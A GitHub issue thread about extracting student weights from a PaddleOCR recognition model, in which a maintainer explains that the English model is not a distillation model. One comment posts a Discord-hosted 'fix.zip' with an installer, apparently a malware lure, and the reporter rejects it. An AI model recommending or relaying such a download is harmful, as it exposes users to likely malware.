### ISSUE TITLE
Extracting student model parameters from en_PP-OCRv3_rec_train error

### ISSUE THREAD

**Issue by johnlockejrr** [PaddlePaddle/PaddleOCR#13810]
### 🔎 Search before asking

- [X] I have searched the PaddleOCR [Docs](https://paddlepaddle.github.io/PaddleOCR/) and found no similar bug report.
- [X] I have searched the PaddleOCR [Issues](https://github.com/PaddlePaddle/PaddleOCR/issues) and found no similar bug report.
- [X] I have searched the PaddleOCR [Discussions](https://github.com/PaddlePaddle/PaddleOCR/discussions) and found no similar bug report.

### 🐛 Bug (问题描述)

I followed the example from [https://github-com.translate.goog/PaddlePaddle/PaddleOCR/blob/main/doc/doc_ch/knowledge_distillation.md?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp#215-%E8%92%B8%E9%A6%8F%E6%A8%A1%E5%9E%8B%E5%BE%AE%E8%B0%83](url) to extract the student model parameters on `en_PP-OCRv3_rec_train` model but I get the following error (on `ch_PP-OCRv3_rec_train` works!):

`/home/incognito/PaddleOCR/PaddleOCR-py3.10/lib/python3.10/site-packages/paddle/framework/io.py:939: UserWarning: The input state dict is empty, no need to save.
  warnings.warn("The input state dict is empty, no need to save.")`

Script used:

```import paddle
# 加载预训练模型
all_params = paddle.load("pretrain_models/en_PP-OCRv3_rec_train/best_accuracy.pdparams")
# 查看权重参数的keys
print(all_params.keys())
# 学生模型的权重提取
s_params = {key[len("Student."):]: all_params[key] for key in all_params if "Student." in key}
# 查看学生模型权重参数的keys
print(s_params.keys())
# 保存
paddle.save(s_params, "pretrain_models/en_PP-OCRv3_rec_train/student.pdparams")```

### 🏃‍♂️ Environment (运行环境)

```
OS	Ubuntu-22.04 WSL 2
Environment	Terminal
Python	3.10
Install	git
CPU	11th Gen Intel(R) Core(TM) i7-1165G7 @ 2.80GHz
CUDA	12.4
PaddlePaddle	paddlepaddle-gpu==3.0.0b1
paddleocr	2.8.1
```

### 🌰 Minimal Reproducible Example (最小可复现问题的Demo)

`python get_stud.py`

**Comment by zawa999** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by johnlockejrr** [comment]
> try this https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538& select the desired compiler in the installer

How dumb you think I am? I'm on linux anyway!

![image](https://github.com/user-attachments/assets/47b2cb12-4b82-40e8-a7a6-7eacfd3b6e56)

**Comment by GreatV** [comment]
please refer to: https://paddlepaddle.github.io/PaddleOCR/en/ppocr/model_compress/knowledge_distillation.html#225-fine-tuning-distillation-model

I can't reproduce your issue.

```shell
ls -lah ch_PP-OCRv3_rec_train
total 412M
drwxr-xr-x  2 greatx greatx 4.0K Sep  6 01:40 .
drwxrwxr-x 11 greatx greatx 4.0K Sep  6 01:40 ..
-rw-r--r--  1 greatx greatx 275M Apr 27  2022 best_accuracy.pdparams
-rw-rw-r--  1 greatx greatx 138M Sep  6 01:40 student.pdparams
```

**Comment by GreatV** [comment]
en_PP-OCRv3_rec_train is **not** distillation model. please refer to: https://paddlepaddle.github.io/PaddleOCR/en/ppocr/model_compress/knowledge_distillation.html#215-fine-tuning-distillation-model
